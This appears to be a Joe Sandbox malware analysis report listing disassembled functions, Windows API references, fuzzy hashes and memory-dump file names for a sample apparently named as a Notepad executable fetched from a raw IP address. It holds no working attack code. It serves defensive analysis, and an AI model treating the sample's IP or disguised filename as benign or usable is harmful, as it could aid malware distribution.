Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 4402fd7a9f35548a0a6e406088b1ac9e9fe92c8952a9fc7886658e1653cea504
Instruction ID: eac1dc2a4e254d58701bd785b73ac989fcc91e2c45851686d203dcb15de561a7
Opcode Fuzzy Hash: 4402fd7a9f35548a0a6e406088b1ac9e9fe92c8952a9fc7886658e1653cea504
Instruction Fuzzy Hash: 25F09032D45B319BEA21FBA8BC0775D77A06F00720F650519F864A61D2CB3C5840FA9A

Function 00EF397C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EF3B14
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EF3B27

Strings

R9, xrefs: 00EF39FB
R9, xrefs: 00EF3A1D

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: R9$R9
API String ID: 885266447-1404460753
Opcode ID: 72df274a6815854767ead729874a0cf8ba9f4540d098661614c5bc19ce888248
Instruction ID: 880ada88bfef1564e71a08342ecbf8fba930b18b4dd5bb51dfe33e503dfa0c56
Opcode Fuzzy Hash: 72df274a6815854767ead729874a0cf8ba9f4540d098661614c5bc19ce888248
Instruction Fuzzy Hash: 13518C71A0024CAFCF24CFA9C891EBEBBB2EB88314F149159EA95A7351D331DE41CB50

Function 00EEA030 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00EEA06F
__IsNonwritableInCurrentImage.LIBCMT ref: 00EEA123

Strings

C, xrefs: 00EEA13C
csm, xrefs: 00EEA10D

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm$C
API String ID: 3480331319-2488452313
Opcode ID: 10db2e243cecbc159c9f1361927a3e7213b667c234bba45e6a0e7c8e9ed27dd6
Instruction ID: b8bd09ff0874f1bc8ab3607461d2625d323598b1ae37074b070be302a073c1dc
Opcode Fuzzy Hash: 10db2e243cecbc159c9f1361927a3e7213b667c234bba45e6a0e7c8e9ed27dd6
Instruction Fuzzy Hash: 8641B674A0124DDBCF10DF6AC884AAE7BF5AF45314F189069E914BB352D731E905CB92

Function 00EEB372 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00EEB323,00000000,?,00F69E5C,?,?,?,00EEB4C6,00000004,InitializeCriticalSectionEx,00EFFC70,InitializeCriticalSectionEx), ref: 00EEB37F
GetLastError.KERNEL32(?,00EEB323,00000000,?,00F69E5C,?,?,?,00EEB4C6,00000004,InitializeCriticalSectionEx,00EFFC70,InitializeCriticalSectionEx,00000000,?,00EEB27D), ref: 00EEB389
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00EEB3B1

Strings

api-ms-, xrefs: 00EEB396

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 9d2e098aac89645ea175d086e0a7028f96874cadd311615e073d26e702e565d1
Instruction ID: 434ecbc654cd9ec1a5fedf1297f4afe4c777e90bdb40caa668f88e032c6b57b6
Opcode Fuzzy Hash: 9d2e098aac89645ea175d086e0a7028f96874cadd311615e073d26e702e565d1
Instruction Fuzzy Hash: DBE01A3028420CBAEF201FA2EC87B293E59AB40B44F101020FA0CF81E1FBE1AC64C695

Function 00EF2922 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(E4349370,00000000,00000000,00000000), ref: 00EF2985

Part of subcall function 00EF6F16: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00EF5FDB,?,00000000,-00000008), ref: 00EF6FC2

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00EF2BE0
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00EF2C28
GetLastError.KERNEL32 ref: 00EF2CCB

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: c8c4d3388d6a77b16344a6a55f0a8434eeecbdb05df759d5751801c785eae142
Instruction ID: 7c152f9b050c3636ea30fe3ea1f1c2472815b4416964930699e9422dbd9c4b75
Opcode Fuzzy Hash: c8c4d3388d6a77b16344a6a55f0a8434eeecbdb05df759d5751801c785eae142
Instruction Fuzzy Hash: 78D135B5D006589FCB15CFA8D880AADFBB5FF48304F18416AEA65FB351D730A942CB50

Function 00F16066 Relevance: 6.3, APIs: 4, Instructions: 325COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F16097
_memset.LIBCMT ref: 00F160B7
_memset.LIBCMT ref: 00F160C8
_memset.LIBCMT ref: 00F160D9

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: f8f2153a799745a3823d4200728c2e8b4f8fcabfd3bf63ecfc095cee7d3419b3
Instruction ID: 0d72b5dec254fff826199237a1ab5cb053b13b601f85531f35e60550b5b78ae8
Opcode Fuzzy Hash: f8f2153a799745a3823d4200728c2e8b4f8fcabfd3bf63ecfc095cee7d3419b3
Instruction Fuzzy Hash: 38D1D4B291012DAADB20EB90DC42BD9B7B8AF04744F1054E7A508B3051DB757FC9EFA1

Function 00F20261 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F20286
_memset.LIBCMT ref: 00F20295
_memset.LIBCMT ref: 00F20455
_memset.LIBCMT ref: 00F20467

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: e6a4378ef944a74b131cf10b70e7dc44835de18d1aba5a5ebab30bde6206ff17
Instruction ID: 6c8f49b3d2ed78306c6b0cde86acef544cb00d86e73ba5d28f7e06d35231a5e2
Opcode Fuzzy Hash: e6a4378ef944a74b131cf10b70e7dc44835de18d1aba5a5ebab30bde6206ff17
Instruction Fuzzy Hash: 1651DAB1D4022A9BCB61EF24DD82ADDB3BCAB44744F5100E5A618B3152DF386FC69F54

Function 00F1E39D Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F1E3C2
_memset.LIBCMT ref: 00F1E436
_memset.LIBCMT ref: 00F1E4AA
_memset.LIBCMT ref: 00F1E51E

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: cd4a56d92ebe8f612b610e688c4f30728cb1f6f2652345522dcac12796165e9d
Instruction ID: c381192355de354276266818a68f25019954c1b23655ba1901f457defdaa551e
Opcode Fuzzy Hash: cd4a56d92ebe8f612b610e688c4f30728cb1f6f2652345522dcac12796165e9d
Instruction Fuzzy Hash: 4641B471D4021D7ACB14EB60EC47FDD737CAB08710F2444A5BA04B70D1EAB9AB889F95

Function 00F2E9B5 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00F2E9C1

Part of subcall function 00F2C954: __getptd_noexit.LIBCMT ref: 00F2C957
Part of subcall function 00F2C954: __amsg_exit.LIBCMT ref: 00F2C964

__amsg_exit.LIBCMT ref: 00F2E9E1
__lock.LIBCMT ref: 00F2E9F1
_free.LIBCMT ref: 00F2EA21

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3170801528-0
Opcode ID: cdb488327a21f6d606db66afea2a437e5231a64039bb5e551d8e41bc4490d92d
Instruction ID: b348ffae4c604ff1dbcec2541ef39ba7c4ef08283ebeedc5daad0d40b5b2df9f
Opcode Fuzzy Hash: cdb488327a21f6d606db66afea2a437e5231a64039bb5e551d8e41bc4490d92d
Instruction Fuzzy Hash: 07018032D05A31EBCB21AB65B84676D7760BF04B20F650117F850A7291C73C6D81EFD5

Function 00EFBE0B Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00EFAE3B,00000000,?,00000000,00000000,?,00EF2D1F,00000000,00000000,00000000), ref: 00EFBE22
GetLastError.KERNEL32(?,00EFAE3B,00000000,?,00000000,00000000,?,00EF2D1F,00000000,00000000,00000000,00000000,00000000,?,00EF32A6,00000000), ref: 00EFBE2E

Part of subcall function 00EFBDF4: CloseHandle.KERNEL32(FFFFFFFE,00EFBE3E,?,00EFAE3B,00000000,?,00000000,00000000,?,00EF2D1F,00000000,00000000,00000000,00000000,00000000), ref: 00EFBE04

___initconout.LIBCMT ref: 00EFBE3E

Part of subcall function 00EFBDB6: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EFBDE5,00EFAE28,00000000,?,00EF2D1F,00000000,00000000,00000000,00000000), ref: 00EFBDC9

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00EFAE3B,00000000,?,00000000,00000000,?,00EF2D1F,00000000,00000000,00000000,00000000), ref: 00EFBE53

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: d8443d053c916902e2d92a99cf9beea0a2317c7302b00561a7469f12afe99c6b
Instruction ID: dbd4676eb35ad700c889607601fff15baf315daeb3506dfb07d7ee82f755e312
Opcode Fuzzy Hash: d8443d053c916902e2d92a99cf9beea0a2317c7302b00561a7469f12afe99c6b
Instruction Fuzzy Hash: 43F0303650011CBFCF221FA2DC049EA3FA6FB487A4B014010FB49A5231CB329C20EB91

Function 00EE5BCD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

_Fputc.LIBCPMT ref: 00EE5CA6

Strings

C, xrefs: 00EE5C85

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: Fputc
String ID: C
API String ID: 3078413507-2531096973
Opcode ID: 0555979246da84237d3042b0580295ce06041879c92a58bda65ba7285ef202e4
Instruction ID: a29c982a061e870e5dea3fa3279d683138181ac16813ad51192ed0336b8263de
Opcode Fuzzy Hash: 0555979246da84237d3042b0580295ce06041879c92a58bda65ba7285ef202e4
Instruction Fuzzy Hash: FB417E76900A5EABCB18DF66C890CEDB7B9FF18318F246066E501B7640EB31ED41CB90

Function 00EEA93D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00EEA962

Strings

RCC, xrefs: 00EEA97C
MOC, xrefs: 00EEA974

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: acb7f049261178bec08b78c0bfb08b44c0d53e41935c796ce020056fa7e350ea
Instruction ID: d3d3ae148260ccba58dfa0c7b88cf3be2f7fbd4e193870145b8daea0d5373ce0
Opcode Fuzzy Hash: acb7f049261178bec08b78c0bfb08b44c0d53e41935c796ce020056fa7e350ea
Instruction Fuzzy Hash: 4341883290024DAFCF15DF95DD81AAEBBB5FF88304F199069F908B7221D335AA50CB52

Function 00EE517B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00EE5187
std::_Lockit::~_Lockit.LIBCPMT ref: 00EE51E3

Strings

C, xrefs: 00EE51AE, 00EE51C8

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: C
API String ID: 593203224-2531096973
Opcode ID: 514d3aaf78f8a1ac8a1e1a611b7f67585bd197230e046d190f4ac05a0e7165c0
Instruction ID: 714903bce35d44daf82a0a100dbb8ee6acb0840b3bab00c3f0693d160c9b5071
Opcode Fuzzy Hash: 514d3aaf78f8a1ac8a1e1a611b7f67585bd197230e046d190f4ac05a0e7165c0
Instruction Fuzzy Hash: 10019E31A00919EFCB05DB2AC885EADB7B8EF85754F140099E801AB360DB70FE44CB50

Function 00EE15D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00EE15DC
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00EE1614

Part of subcall function 00EE51EC: _Yarn.LIBCPMT ref: 00EE520B
Part of subcall function 00EE51EC: _Yarn.LIBCPMT ref: 00EE522F

Strings

bad locale name, xrefs: 00EE1622

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 94197c6044eb31a49577a91c3c2eb3782d59ba01c886cdf011adff911e020003
Instruction ID: 7b40608399d9b9ed37dff5d423934a7196e3b35abdd4f25b1bd2337c7bb8a777
Opcode Fuzzy Hash: 94197c6044eb31a49577a91c3c2eb3782d59ba01c886cdf011adff911e020003
Instruction Fuzzy Hash: 18F04972505B849E83309F7A8481403FBE4BE283103909A2EE19EC3A11C730A504CB6A

Function 00EF20B7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 00EF20F7

Strings

C, xrefs: 00EF20E7
InitializeCriticalSectionEx, xrefs: 00EF20C7

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx$C
API String ID: 2593887523-420458283
Opcode ID: d22ead3b746bd3843db9ff5e2bbc1c71efcdcad7c3af6ce18a0beec6b9e431cd
Instruction ID: 53c220a12a187f293a6647545103e085728b4e21522afd053adeca95c4af28cb
Opcode Fuzzy Hash: d22ead3b746bd3843db9ff5e2bbc1c71efcdcad7c3af6ce18a0beec6b9e431cd
Instruction Fuzzy Hash: DAE0ED3268022DBBCB111B61DC05DAA7F15EB447A1F005125FF18751A0DFB29960E695

Function 00EF1F3D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00EF1F71

Strings

C, xrefs: 00EF1F67
FlsAlloc, xrefs: 00EF1F4D

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: Alloc
String ID: FlsAlloc$C
API String ID: 2773662609-613673801
Opcode ID: b9371cf31c2bf168028dab49552a4be5053eebfae212ad2a2ee12ef88a3836ed
Instruction ID: 4afd70c487252c803fb40d47b137c13178018f39b5a566d99d29a464aa17e664
Opcode Fuzzy Hash: b9371cf31c2bf168028dab49552a4be5053eebfae212ad2a2ee12ef88a3836ed
Instruction Fuzzy Hash: EBE0C232A8032CF7C7102372AC0A9BEBE44DF89B60B411060FF0871291DAA16801A2D7

Analysis Process: http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exePID: 1612, Parent PID: 6936COMMON

Execution Graph

Execution Coverage:	14.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	185
Total number of Limit Nodes:	9

Executed Functions

Function 07512A30 Relevance: 3.2, Strings: 2, Instructions: 735
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 07512BAE
,, xrefs: 07512C19

Memory Dump Source

Source File: 00000006.00000002.4402463645.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7510000_http147.jbxd

Similarity

API ID:
String ID: ,$4'^q
API String ID: 0-3030180809
Opcode ID: f73d71012f9440767948436a8da6dbd59abbd8ceeb537486e177ed96a361eba3
Instruction ID: 9208bfde72452c8ce6f93daf51459d2ad971d7a9f190bd827110ff8fa456ad0b
Opcode Fuzzy Hash: f73d71012f9440767948436a8da6dbd59abbd8ceeb537486e177ed96a361eba3
Instruction Fuzzy Hash: 33729FB5E012698FDB64CF59C880BDDBBF6BB89300F1495E6E81DA7311D730AA858F50

Function 07237A68 Relevance: 1.5, Strings: 1, Instructions: 234COMMON

Download Yara Rule

Strings

